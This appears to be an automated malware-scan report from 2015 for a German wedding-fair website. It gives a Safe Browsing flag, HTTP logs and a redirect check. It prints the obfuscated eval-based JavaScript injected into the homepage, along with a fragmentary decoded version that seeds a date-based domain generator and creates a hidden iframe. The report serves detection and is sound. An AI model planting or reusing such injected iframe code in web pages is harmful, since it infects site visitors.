Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hochzeitsmessen-remsmurr.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hochzeitsmessen-remsmurr.com/ | 200 OK Content-Length: 6846 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
try{abgraebg++}catch(ratntndrt){try{1512|htxhgrnegbr}catch(fzgnergz){e=window["ev"+"al"]}}
if(1){f=[91,105,97,88,104,92,100,98,19,99,89,107,105,70,84,99,88,98,98,66,104,98,86,88,103,28,28,112,1,-3,21,20,19,21,106,84,103,20,91,94,20,48,21,104,91,94,103,33,104,89,88,89,20,34,21,104,91,94,103,33,70,47,0,-1,20,19,21,20,105,86,102,19,97,99,19,50,20,103,93,93,102,35,103,88,90,88,19,26,20,103,93,93,102,35,69,46,2,-2,19,21,20,19,107,85,101,21,104,88,104,104,19,50,20,103,93,93,102,35,53,19,31,20,95,
if(012===10)e("if(1)"+s);
Decoded script:
if(1)function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = Math.ceil(d.getHours()/3); this.seed = 23456789 document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return
Antivirus reports:
http://hochzeitsmessen-remsmurr.com/test404page.js | 404 Not Found Content-Length: 478 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hochzeitsmessen-remsmurr.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 00:29:26 GMT
Accept-Ranges: bytes
ETag: "4d6a8be-1abe-4c80048561980"
Server: Apache
Vary: Accept-Encoding
Content-Length: 6846
Content-Type: text/html
Last-Modified: Fri, 24 Aug 2012 10:17:26 GMT
...6846 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hochzeitsmessen-remsmurr.com
Referer: http://www.google.com/search?q=hochzeitsmessen-remsmurr.com
Result:
The result is similar to the first query. There are no suspicious redirects found.